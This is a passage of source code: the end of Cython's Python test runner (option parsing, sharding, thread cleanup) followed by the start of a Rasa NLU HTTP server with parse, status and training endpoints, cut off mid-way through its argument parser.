    def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=sys.version_info[0] < 3):
        # Cannot use simple hash() here as shard processes might use different hash seeds.
        # CRC32 is fast and simple, but might return negative values in Py2.
        if _is_py2:
            hashval = _hash(testname) & 0x7fffffff
        else:
            hashval = _hash(testname.encode())
        return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
    """Raised when left-over worker threads are still alive after a test run."""
    pass
# Threads already reported as left-over in an earlier call, so repeated
# checks (with ignore_seen=True) do not fail again for the same thread.
threads_seen = []

def check_thread_termination(ignore_seen=True):
    """Join all non-main threads briefly and fail on survivors.

    Every enumerated thread except the current one and the 'time_stamper'
    helper gets a 2-second join.  Threads still alive afterwards are
    reported to stderr and raise PendingThreadsError.  With the default
    ``ignore_seen=True``, a thread is only reported the first time it is
    encountered (tracked in ``threads_seen``).
    """
    if threading is None: # no threading enabled in CPython
        return
    # FIX: currentThread()/isAlive() are deprecated aliases (isAlive was
    # removed in Python 3.9); the snake_case names exist since Python 2.6.
    current = threading.current_thread()
    blocking_threads = []
    for t in threading.enumerate():
        if not t.is_alive() or t == current or t.name == 'time_stamper':
            continue
        t.join(timeout=2)
        if t.is_alive():
            if not ignore_seen:
                blocking_threads.append(t)
                continue
            for seen in threads_seen:
                if t is seen:
                    break
            else:
                threads_seen.append(t)
                blocking_threads.append(t)
    if not blocking_threads:
        return
    sys.stderr.write("warning: left-over threads found after running test:\n")
    for t in blocking_threads:
        sys.stderr.write('...%s\n' % repr(t))
    raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
    """Run *cmd* and return its combined stdout/stderr decoded as UTF-8.

    Returns the empty string when the command cannot be executed (OSError,
    e.g. the binary does not exist).
    """
    try:
        pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        raw = pipe.communicate()[0]
    except OSError:
        return ''
    return raw.decode('UTF-8')
def get_version():
    """Return the Cython version string for test reporting.

    When running from a git checkout, the HEAD commit is appended if it
    differs from the commit the release tag points at, and
    ' + uncommitted changes' is appended when the working tree is dirty.
    """
    from Cython.Compiler.Version import version as cython_version
    repo_root = os.path.dirname(os.path.abspath(__file__))
    if not os.path.exists(os.path.join(repo_root, '.git')):
        return cython_version
    annotated = cython_version
    saved_cwd = os.getcwd()
    try:
        os.chdir(repo_root)
        head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
        version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
        diff = subprocess_output(['git', 'diff', '--stat']).strip()
        if head_commit != version_commit:
            annotated += " " + head_commit
        if diff:
            annotated += ' + uncommitted changes'
    finally:
        os.chdir(saved_cwd)
    return annotated
# The streams as they were at import time, before any test redirects them.
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr

def flush_and_terminate(status):
    """Flush the original stdout/stderr, then hard-exit with *status*.

    os._exit() bypasses normal interpreter shutdown on purpose: it also
    kills any left-over non-daemon threads that would keep the process alive.
    """
    try:
        for stream in (_orig_stdout, _orig_stderr):
            stream.flush()
    finally:
        os._exit(status)
def main():
    """Top-level entry point: parse options, optionally fan the run out over
    shard worker processes, run the tests, report stats/coverage and exit
    with an appropriate status code.
    """
    global DISTDIR, WITH_CYTHON
    # Directory containing this script (and therefore the 'tests' tree).
    DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))

    # Translate any --debug-* flags directly into Cython DebugFlags switches
    # before the regular option parser sees them.
    from Cython.Compiler import DebugFlags
    args = []
    for arg in sys.argv[1:]:
        if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
            setattr(DebugFlags, arg[2:].replace('-', '_'), True)
        else:
            args.append(arg)

    from optparse import OptionParser
    parser = OptionParser()
    parser.add_option("--no-cleanup", dest="cleanup_workdir",
                      action="store_false", default=True,
                      help="do not delete the generated C files (allows passing --no-cython on next run)")
    parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
                      action="store_false", default=True,
                      help="do not delete the generated shared library files (allows manual module experimentation)")
    parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
                      action="store_false", default=True,
                      help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
    parser.add_option("--no-cython", dest="with_cython",
                      action="store_false", default=True,
                      help="do not run the Cython compiler, only the C compiler")
    parser.add_option("--compiler", dest="compiler", default=None,
                      help="C compiler type")
    backend_list = ','.join(BACKENDS)
    parser.add_option("--backends", dest="backends", default=backend_list,
                      help="select backends to test (default: %s)" % backend_list)
    parser.add_option("--no-c", dest="use_c",
                      action="store_false", default=True,
                      help="do not test C compilation backend")
    parser.add_option("--no-cpp", dest="use_cpp",
                      action="store_false", default=True,
                      help="do not test C++ compilation backend")
    parser.add_option("--no-unit", dest="unittests",
                      action="store_false", default=True,
                      help="do not run the unit tests")
    parser.add_option("--no-doctest", dest="doctests",
                      action="store_false", default=True,
                      help="do not run the doctests")
    parser.add_option("--no-file", dest="filetests",
                      action="store_false", default=True,
                      help="do not run the file based tests")
    parser.add_option("--no-pyregr", dest="pyregr",
                      action="store_false", default=True,
                      help="do not run the regression tests of CPython in tests/pyregr/")
    parser.add_option("--no-examples", dest="examples",
                      action="store_false", default=True,
                      help="Do not run the documentation tests in the examples directory.")
    parser.add_option("--no-code-style", dest="code_style",
                      action="store_false", default=True,
                      help="Do not run the code style (PEP8) checks.")
    parser.add_option("--cython-only", dest="cython_only",
                      action="store_true", default=False,
                      help="only compile pyx to c, do not run C compiler or run the tests")
    parser.add_option("--no-refnanny", dest="with_refnanny",
                      action="store_false", default=True,
                      help="do not regression test reference counting")
    parser.add_option("--no-fork", dest="fork",
                      action="store_false", default=True,
                      help="do not fork to run tests")
    parser.add_option("--sys-pyregr", dest="system_pyregr",
                      action="store_true", default=False,
                      help="run the regression tests of the CPython installation")
    parser.add_option("-x", "--exclude", dest="exclude",
                      action="append", metavar="PATTERN",
                      help="exclude tests matching the PATTERN")
    parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
                      type=int, default=1,
                      help="shard this run into several parallel runs")
    parser.add_option("--shard_num", dest="shard_num", metavar="K",
                      type=int, default=-1,
                      help="test only this single shard")
    parser.add_option("--profile", dest="profile",
                      action="store_true", default=False,
                      help="enable profiling of the tests")
    parser.add_option("-C", "--coverage", dest="coverage",
                      action="store_true", default=False,
                      help="collect source coverage data for the Compiler")
    parser.add_option("--coverage-xml", dest="coverage_xml",
                      action="store_true", default=False,
                      help="collect source coverage data for the Compiler in XML format")
    parser.add_option("--coverage-html", dest="coverage_html",
                      action="store_true", default=False,
                      help="collect source coverage data for the Compiler in HTML format")
    parser.add_option("-A", "--annotate", dest="annotate_source",
                      action="store_true", default=True,
                      help="generate annotated HTML versions of the test source files")
    parser.add_option("--no-annotate", dest="annotate_source",
                      action="store_false",
                      help="do not generate annotated HTML versions of the test source files")
    parser.add_option("-v", "--verbose", dest="verbosity",
                      action="count", default=0,
                      help="display test progress, pass twice to print test names")
    parser.add_option("-T", "--ticket", dest="tickets",
                      action="append",
                      help="a bug ticket number to run the respective test in 'tests/*'")
    parser.add_option("-3", dest="language_level",
                      action="store_const", const=3, default=2,
                      help="set language level to Python 3 (useful for running the CPython regression tests)'")
    parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
                      help="write test results in XML to directory DIR")
    parser.add_option("--exit-ok", dest="exit_ok", default=False,
                      action="store_true",
                      help="exit without error code even on test failures")
    parser.add_option("--failfast", dest="failfast", default=False,
                      action="store_true",
                      help="stop on first failure or error")
    parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
                      help=("Directory to look for the file based "
                            "tests (the ones which are deactivated with '--no-file'."))
    parser.add_option("--examples-dir", dest="examples_dir",
                      default=os.path.join(DISTDIR, 'docs', 'examples'),
                      help="Directory to look for documentation example tests")
    parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
                      help="working directory")
    parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
                      help="Cython installation directory (default: use local source version)")
    parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
                      help="configure for easier use with a debugger (e.g. gdb)")
    parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
                      help="use pyximport to automatically compile imported .pyx and .py files")
    parser.add_option("--watermark", dest="watermark", default=None,
                      help="deterministic generated by string")
    parser.add_option("--use_common_utility_dir", default=False, action="store_true")
    parser.add_option("--use_formal_grammar", default=False, action="store_true")
    parser.add_option("--test_determinism", default=False, action="store_true",
                      help="test whether Cython's output is deterministic")
    parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
                      help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")

    options, cmd_args = parser.parse_args(args)

    if options.with_cython and sys.version_info[0] >= 3:
        sys.path.insert(0, options.cython_dir)

    # requires glob with the wildcard.
    if sys.version_info < (3, 5) or cmd_args:
        options.code_style = False

    WITH_CYTHON = options.with_cython

    coverage = None
    if options.coverage or options.coverage_xml or options.coverage_html:
        if not WITH_CYTHON:
            options.coverage = options.coverage_xml = options.coverage_html = False
        elif options.shard_num == -1:
            # Coverage is only set up in the parent process (shard_num == -1);
            # shard children produce their own data which is combined below.
            print("Enabling coverage analysis")
            from coverage import coverage as _coverage
            coverage = _coverage(branch=True)
            coverage.erase()
            coverage.start()

    if options.xml_output_dir:
        shutil.rmtree(options.xml_output_dir, ignore_errors=True)

    if options.shard_count > 1 and options.shard_num == -1:
        import multiprocessing
        pool = multiprocessing.Pool(options.shard_count)
        tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
        errors = []
        # NOTE: create process pool before time stamper thread to avoid forking issues.
        total_time = time.time()
        stats = Stats()
        with time_stamper_thread():
            for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
                if return_code != 0:
                    errors.append(shard_num)
                    sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
                sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
                stats.update(shard_stats)
        pool.close()
        pool.join()
        total_time = time.time() - total_time
        sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
        if errors:
            sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
            return_code = 1
        else:
            return_code = 0
    else:
        # Single-process run (or we ARE a shard child).
        with time_stamper_thread():
            _, stats, return_code = runtests(options, cmd_args, coverage)

    if coverage:
        if options.shard_count > 1 and options.shard_num == -1:
            coverage.combine()
        coverage.stop()

    stats.print_stats(sys.stderr)
    if coverage:
        save_coverage(coverage, options)

    sys.stderr.write("ALL DONE\n")
    sys.stderr.flush()

    try:
        check_thread_termination(ignore_seen=False)
    except PendingThreadsError:
        # normal program exit won't kill the threads, do it the hard way here
        flush_and_terminate(return_code)
    else:
        sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
    """
    Print regular time stamps into the build logs to find slow tests.
    @param interval: time interval in seconds
    """
    try:
        _xrange = xrange
    except NameError:
        _xrange = range

    import threading
    from datetime import datetime
    from time import sleep

    # Sleep in quarter-second slices so the thread notices 'stop' quickly.
    interval = _xrange(interval * 4)
    now = datetime.now
    write = sys.__stderr__.write
    stop = False

    def time_stamper():
        while True:
            for _ in interval:
                if stop:
                    return
                sleep(1./4)
            write('\n#### %s\n' % now())

    thread = threading.Thread(target=time_stamper, name='time_stamper')
    # FIX: Thread.setDaemon() is deprecated (removed in Python 3.13); the
    # 'daemon' attribute exists since Python 2.6, so this stays compatible.
    thread.daemon = True
    thread.start()
    try:
        yield
    finally:
        stop = True
        thread.join()
def configure_cython(options):
    """Import the Cython compiler and apply test-run wide settings.

    Publishes CompilationOptions and the compiler's default options as
    globals for use by the test builders, enables all warnings and full
    cleanup code, and applies profiling/grammar/watermark options.
    """
    global CompilationOptions, pyrex_default_options, cython_compile
    from Cython.Compiler.Main import \
        CompilationOptions, \
        default_options as pyrex_default_options
    from Cython.Compiler.Options import _directive_defaults as directive_defaults
    from Cython.Compiler import Errors, Options, DebugFlags

    Errors.LEVEL = 0  # show all warnings
    Options.generate_cleanup_code = 3  # complete cleanup code
    DebugFlags.debug_temp_code_comments = 1
    pyrex_default_options['formal_grammar'] = options.use_formal_grammar

    if options.profile:
        directive_defaults['profile'] = True
    if options.watermark:
        import Cython.Compiler.Version
        Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
    """Write the coverage reports that were requested on the command line."""
    emitters = (
        (options.coverage, lambda: coverage.report(show_missing=0)),
        (options.coverage_xml, lambda: coverage.xml_report(outfile="coverage-report.xml")),
        (options.coverage_html, lambda: coverage.html_report(directory="coverage-report-html")),
    )
    for wanted, emit in emitters:
        if wanted:
            emit()
def runtests_callback(args):
    """Worker entry point for the shard pool: unpack one
    (options, cmd_args, shard_num) task and run that single shard."""
    opts, cli_args, shard = args
    opts.shard_num = shard
    return runtests(opts, cli_args)
def runtests(options, cmd_args, coverage=None):
    """Run one (possibly sharded) test pass and return
    (shard_num, stats, return_code).

    Builds the exclusion selectors, assembles the unittest suite from unit
    tests, doctests, file tests, examples and (optionally) CPython's own
    regression tests, then runs it with either the XML or the text runner.
    """
    WITH_CYTHON = options.with_cython
    ROOTDIR = os.path.abspath(options.root_dir)
    WORKDIR = os.path.abspath(options.work_dir)

    if WITH_CYTHON:
        configure_cython(options)

    xml_output_dir = options.xml_output_dir
    # Each shard child works in (and reports into) its own subdirectory.
    if options.shard_num > -1:
        WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
        if xml_output_dir:
            xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)

    # RUN ALL TESTS!
    UNITTEST_MODULE = "Cython"
    UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
    if WITH_CYTHON:
        # Clear out stale build products, but keep refnanny/Cy3 support dirs.
        if os.path.exists(WORKDIR):
            for path in os.listdir(WORKDIR):
                if path in ("support", "Cy3"): continue
                shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
    if not os.path.exists(WORKDIR):
        os.makedirs(WORKDIR)

    # Only the parent / non-sharded run prints the banner.
    if options.shard_num <= 0:
        sys.stderr.write("Python %s\n" % sys.version)
        sys.stderr.write("\n")
        if WITH_CYTHON:
            sys.stderr.write("Running tests against Cython %s\n" % get_version())
        else:
            sys.stderr.write("Running tests without Cython.\n")

    if options.for_debugging:
        options.cleanup_workdir = False
        options.cleanup_sharedlibs = False
        options.fork = False
        if WITH_CYTHON and include_debugger:
            from Cython.Compiler.Main import default_options as compiler_default_options
            compiler_default_options['gdb_debug'] = True
            compiler_default_options['output_dir'] = os.getcwd()

    if IS_PYPY:
        if options.with_refnanny:
            sys.stderr.write("Disabling refnanny in PyPy\n")
            options.with_refnanny = False

    if options.with_refnanny:
        # Build the refnanny helper module and enable refcount checking.
        from pyximport.pyxbuild import pyx_to_dll
        libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
                             build_in_temp=True,
                             pyxbuild_dir=os.path.join(WORKDIR, "support"))
        sys.path.insert(0, os.path.split(libpath)[0])
        CFLAGS.append("-DCYTHON_REFNANNY=1")

    if xml_output_dir and options.fork:
        # doesn't currently work together
        sys.stderr.write("Disabling forked testing to support XML test output\n")
        options.fork = False

    if WITH_CYTHON:
        sys.stderr.write("Using Cython language level %d.\n" % options.language_level)

    test_bugs = False
    if options.tickets:
        for ticket_number in options.tickets:
            test_bugs = True
            cmd_args.append('ticket:%s' % ticket_number)
    if not test_bugs:
        for selector in cmd_args:
            if selector.startswith('bugs'):
                test_bugs = True

    selectors = [ string_selector(r) for r in cmd_args ]
    verbose_excludes = selectors or options.verbosity >= 2
    if not selectors:
        selectors = [ lambda x, tags=None: True ]

    # Check which external modules are not present and exclude tests
    # which depends on them (by prefix)
    missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
    version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
    exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit

    try:
        import IPython.core.release
        if list(IPython.core.release._ver) < [1, 0, 0]:
            raise ImportError
    except (ImportError, AttributeError, TypeError):
        exclude_selectors.append(RegExSelector('IPython'))

    try:
        # Deliberately disabled: the unconditional raise skips the Jedi tests.
        raise ImportError("Jedi typer is currently broken, see GH#1845")
        import jedi
        if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
            raise ImportError
    except (ImportError, AttributeError, TypeError):
        exclude_selectors.append(RegExSelector('Jedi'))

    if options.exclude:
        exclude_selectors += [ string_selector(r) for r in options.exclude ]

    if not COMPILER_HAS_INT128 or not IS_CPYTHON:
        exclude_selectors += [RegExSelector('int128')]

    if options.shard_num > -1:
        exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))

    if not test_bugs:
        # Known-failure lists; platform-specific ones apply conditionally.
        bug_files = [
            ('bugs.txt', True),
            ('pypy_bugs.txt', IS_PYPY),
            ('windows_bugs.txt', sys.platform == 'win32'),
            ('cygwin_bugs.txt', sys.platform == 'cygwin')
        ]

        exclude_selectors += [
            FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
                             verbose=verbose_excludes)
            for bugs_file_name, condition in bug_files if condition
        ]

    global COMPILER
    if options.compiler:
        COMPILER = options.compiler

    selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
    backends = []
    for backend in selected_backends:
        if backend == 'c' and not options.use_c:
            continue
        elif backend == 'cpp' and not options.use_cpp:
            continue
        elif backend not in BACKENDS:
            sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
                backend, ','.join(BACKENDS)))
            sys.exit(1)
        backends.append(backend)
    if options.shard_num <= 0:
        sys.stderr.write("Backends: %s\n" % ','.join(backends))
    languages = backends

    if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
        bugs_file_name = 'travis_macos_cpp_bugs.txt'
        exclude_selectors += [
            FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
                             verbose=verbose_excludes)
        ]

    if options.use_common_utility_dir:
        common_utility_dir = os.path.join(WORKDIR, 'utility_code')
        if not os.path.exists(common_utility_dir):
            os.makedirs(common_utility_dir)
    else:
        common_utility_dir = None

    sys.stderr.write("\n")

    test_suite = unittest.TestSuite()
    stats = Stats()

    if options.unittests:
        collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)

    if options.doctests:
        collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)

    if options.filetests and languages:
        filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
                                options, options.pyregr, languages, test_bugs,
                                options.language_level, common_utility_dir,
                                options.pythran_dir, add_embedded_test=True, stats=stats)
        test_suite.addTest(filetests.build_suite())

    if options.examples and languages:
        for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
            filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
                                    options, options.pyregr, languages, test_bugs,
                                    options.language_level, common_utility_dir,
                                    options.pythran_dir,
                                    default_mode='compile', stats=stats)
            test_suite.addTest(filetests.build_suite())

    if options.system_pyregr and languages:
        sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
        if not os.path.isdir(sys_pyregr_dir):
            sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
        if os.path.isdir(sys_pyregr_dir):
            filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
                                    options, True, languages, test_bugs,
                                    sys.version_info[0], common_utility_dir, stats=stats)
            sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
            test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))

    if options.code_style and options.shard_num <= 0:
        try:
            import pycodestyle
        except ImportError:
            # Hack to make the exclusion visible.
            missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
        else:
            test_suite.addTest(TestCodeFormat(options.cython_dir))

    if xml_output_dir:
        from Cython.Tests.xmlrunner import XMLTestRunner
        if not os.path.exists(xml_output_dir):
            try:
                os.makedirs(xml_output_dir)
            except OSError:
                pass # concurrency issue?
        test_runner = XMLTestRunner(output=xml_output_dir,
                                    verbose=options.verbosity > 0)
        if options.failfast:
            sys.stderr.write("--failfast not supported with XML runner\n")
    else:
        text_runner_options = {}
        if options.failfast:
            if sys.version_info < (2, 7):
                sys.stderr.write("--failfast not supported with Python < 2.7\n")
            else:
                text_runner_options['failfast'] = True
        test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)

    if options.pyximport_py:
        from pyximport import pyximport
        pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
                          load_py_module_on_import_failure=True, inplace=True)

    try:
        gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
    except AttributeError:
        pass # not available on PyPy

    result = test_runner.run(test_suite)

    # NOTE(review): this uses 'shard_num < 0' while the banner checks above
    # use '<= 0' — confirm whether shard 0 should also clean up here.
    if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
        shutil.rmtree(common_utility_dir)

    if missing_dep_excluder.tests_missing_deps:
        sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
        for test in missing_dep_excluder.tests_missing_deps:
            sys.stderr.write("   %s\n" % test)

    if options.with_refnanny:
        import refnanny
        sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))

    if options.exit_ok:
        return options.shard_num, stats, 0
    else:
        return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
    try:
        main()
    except Exception:
        # Print the traceback ourselves, then make sure stray worker
        # threads cannot keep the failed process alive.
        traceback.print_exc()
        try:
            check_thread_termination(ignore_seen=False)
        except PendingThreadsError:
            # normal program exit won't kill the threads, do it the hard way here
            flush_and_terminate(1)
        sys.exit(1)
|
server.py | import argparse
import json
import os
import urlparse
import multiprocessing
import glob
import warnings
import logging
import signal
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from rasa_nlu.train import do_train
from rasa_nlu.config import RasaNLUConfig
class RasaNLUServer(object):
    """HTTP server that wires together config, emulator, interpreter and the
    DataRouter which services parse/train/status requests."""

    def __init__(self, config):
        self.server = None
        self.config = config
        self.logfile = config.write
        self.emulator = self.__create_emulator()
        self.interpreter = self.__create_interpreter()
        self.data_router = DataRouter(config, self.interpreter, self.emulator)
        if 'DYNO' in os.environ and config.backend == 'mitie':  # running on Heroku
            from rasa_nlu.featurizers.mitie_featurizer import MITIEFeaturizer
            MITIEFeaturizer(config.mitie_file)

    def __create_interpreter(self):
        """Create the interpreter for the configured backend.

        Falls back to the hello-goodbye interpreter when no model directory
        is configured; otherwise loads the stored model metadata (fetching
        from S3 when the directory is missing locally) and dispatches on its
        'backend' entry.
        """
        model_dir = self.config.server_model_dir
        metadata, backend = None, None

        if model_dir is not None:
            # download model from S3 if needed
            if not os.path.isdir(model_dir):
                try:
                    from rasa_nlu.persistor import Persistor
                    p = Persistor(self.config.path, self.config.aws_region, self.config.bucket_name)
                    p.fetch_and_extract('{0}.tar.gz'.format(os.path.basename(model_dir)))
                except Exception:
                    # FIX: was a bare "except:", which also swallowed
                    # SystemExit and KeyboardInterrupt.
                    warnings.warn("using default interpreter, couldn't find model dir or fetch it from S3")

            # FIX: use a context manager so the metadata file handle is
            # closed instead of leaked.
            with open(os.path.join(model_dir, 'metadata.json'), 'rb') as f:
                metadata = json.loads(f.read())
            backend = metadata["backend"]
        elif self.config.backend:
            # FIX: logging.warn is a deprecated alias of logging.warning.
            logging.warning("backend '%s' specified in config, but no model directory is configured. " +
                            "Using 'hello-goodby' backend instead!", self.config.backend)

        if backend is None:
            from interpreters.simple_interpreter import HelloGoodbyeInterpreter
            logging.info("using default hello-goodby backend")
            return HelloGoodbyeInterpreter()
        elif backend.lower() == 'mitie':
            logging.info("using mitie backend")
            from interpreters.mitie_interpreter import MITIEInterpreter
            return MITIEInterpreter(**metadata)
        elif backend.lower() == 'spacy_sklearn':
            logging.info("using spacy + sklearn backend")
            from interpreters.spacy_sklearn_interpreter import SpacySklearnInterpreter
            return SpacySklearnInterpreter(**metadata)
        else:
            raise ValueError("unknown backend : {0}".format(backend))

    def __create_emulator(self):
        """Instantiate the request/response emulator named by config.emulate."""
        mode = self.config.emulate
        if mode is None:
            from emulators import NoEmulator
            return NoEmulator()
        elif mode.lower() == 'wit':
            from emulators.wit import WitEmulator
            return WitEmulator()
        elif mode.lower() == 'luis':
            from emulators.luis import LUISEmulator
            return LUISEmulator()
        elif mode.lower() == 'api':
            from emulators.api import ApiEmulator
            return ApiEmulator()
        else:
            raise ValueError("unknown mode : {0}".format(mode))

    def start(self):
        """Bind the HTTP server on the configured port and serve forever."""
        self.server = HTTPServer(('', self.config.port), lambda *args: RasaRequestHandler(self.data_router, *args))
        logging.info('Started http server on port %s' % self.config.port)
        self.server.serve_forever()

    def stop(self):
        """Flush collected parse logs (if any) and close the listening socket."""
        logging.info('^C received. Aborting.')
        if len(self.data_router.responses) > 0:
            logging.info('saving logs')
            self.data_router.write_logs()
        if self.server is not None:
            logging.info('shutting down server')
            self.server.socket.close()
class DataRouter(object):
    """Mediates between the HTTP layer, the interpreter, the emulator and the
    background training process."""

    def __init__(self, config, interpreter, emulator):
        self.config = config
        self.interpreter = interpreter
        self.emulator = emulator
        self.logfile = config.write
        # de-duplicated JSON-serialised parse results, flushed by write_logs()
        self.responses = set()
        self.model_dir = config.path
        self.token = config.token
        self.train_proc = None

    def extract(self, data):
        """Normalise an incoming request dict via the configured emulator."""
        return self.emulator.normalise_request_json(data)

    def parse(self, text):
        """Run the interpreter on *text* and remember the result for logging."""
        outcome = self.interpreter.parse(text)
        self.responses.add(json.dumps(outcome, sort_keys=True))
        return outcome

    def format(self, data):
        """Convert a parse result into the emulated service's response shape."""
        return self.emulator.normalise_response_json(data)

    def write_logs(self):
        """Dump all collected responses to the configured log file as JSON."""
        with open(self.logfile, 'w') as log:
            decoded = [json.loads(entry) for entry in self.responses]
            log.write(json.dumps(decoded, indent=2))

    def get_status(self):
        """Return a JSON report of training state and available model dirs."""
        proc = self.train_proc
        training = proc.is_alive() if proc is not None else False
        models = glob.glob(os.path.join(self.model_dir, 'model*'))
        return json.dumps({
            "training": training,
            "available_models": models
        })

    def auth(self, path):
        """Accept the request unless a token is configured and not supplied."""
        if self.token is None:
            return True
        query = urlparse.parse_qs(urlparse.urlparse(path).query)
        return "token" in query and query["token"][0] == self.token

    def start_train_proc(self, data):
        """Spawn a background training process, replacing any live one."""
        logging.info("starting train")
        if self.train_proc is not None and self.train_proc.is_alive():
            self.train_proc.terminate()
            logging.info("training process {0} killed".format(self.train_proc))

        fname = 'tmp_training_data.json'
        with open(fname, 'w') as handle:
            handle.write(data)

        overrides = dict(self.config.items())
        overrides["data"] = fname
        train_config = RasaNLUConfig(cmdline_args=overrides)
        self.train_proc = multiprocessing.Process(target=do_train, args=(train_config,))
        self.train_proc.start()
        logging.info("training process {0} started".format(self.train_proc))
class RasaRequestHandler(BaseHTTPRequestHandler):
    """Request handler translating HTTP calls into DataRouter operations."""

    def __init__(self, data_router, *args):
        self.data_router = data_router
        BaseHTTPRequestHandler.__init__(self, *args)

    def _set_headers(self):
        """Send a 200 response with a JSON content type."""
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()

    def auth_err(self):
        """Reject the request with a 401."""
        self.send_response(401)
        self.wfile.write("unauthorized")

    def get_response(self, data_dict):
        """Parse the 'q' value of *data_dict* and return the JSON reply string."""
        if u'q' not in data_dict:
            return json.dumps({"error": "Invalid parse parameter specified"})
        data = self.data_router.extract(data_dict)
        result = self.data_router.parse(data["text"])
        response = self.data_router.format(result)
        return json.dumps(response)

    def do_GET(self):
        if self.data_router.auth(self.path):
            self._set_headers()
            if self.path.startswith("/parse"):
                parsed_path = urlparse.urlparse(urlparse.unquote(self.path).decode('utf-8'))
                data = urlparse.parse_qs(parsed_path.query)
                self.wfile.write(self.get_response(data))
            elif self.path.startswith("/status"):
                response = self.data_router.get_status()
                self.wfile.write(response)
            else:
                self.wfile.write("hello")
        else:
            self.auth_err()
        return

    def do_POST(self):
        if self.data_router.auth(self.path):
            if self.path.startswith("/parse"):
                self._set_headers()
                data_string = self.rfile.read(int(self.headers['Content-Length']))
                data_dict = json.loads(data_string.decode("utf-8"))
                self.wfile.write(self.get_response(data_dict))
            elif self.path.startswith("/train"):
                self._set_headers()
                data_string = self.rfile.read(int(self.headers['Content-Length']))
                # BUG FIX: start_train_proc was called twice here — once with
                # the raw bytes and once with the decoded string — spawning
                # (and immediately killing) an extra training process per
                # request. Start it exactly once with the decoded payload.
                self.data_router.start_train_proc(data_string.decode("utf-8"))
                self.wfile.write(
                    json.dumps({"info": "training started with pid {0}".format(self.data_router.train_proc.pid)})
                )
        else:
            self.auth_err()
        return
def create_argparser():
    """Build the command line parser for the NLU server."""
    arg_parser = argparse.ArgumentParser(description='parse incoming text')
    arg_parser.add_argument(
        '-c', '--config',
        help="config file, all the command line options can also be passed via a (json-formatted) " +
             "config file. NB command line args take precedence")
    arg_parser.add_argument(
        '-d', '--server_model_dir',
        help='directory containing model to for parser to use')
    arg_parser.add_argument(
        '-e', '--emulate', choices=['wit', 'luis', 'api'],
        help='which service to emulate (default: None i.e. use simple built in format)')
    arg_parser.add_argument(
        '-l', '--language', choices=['de', 'en'],
        help="model and data language")
    arg_parser.add_argument(
        '-m', '--mitie_file',
        help='file with mitie total_word_feature_extractor')
    arg_parser.add_argument(
        '-p', '--path',
        help="path where model files will be saved")
    arg_parser.add_argument(
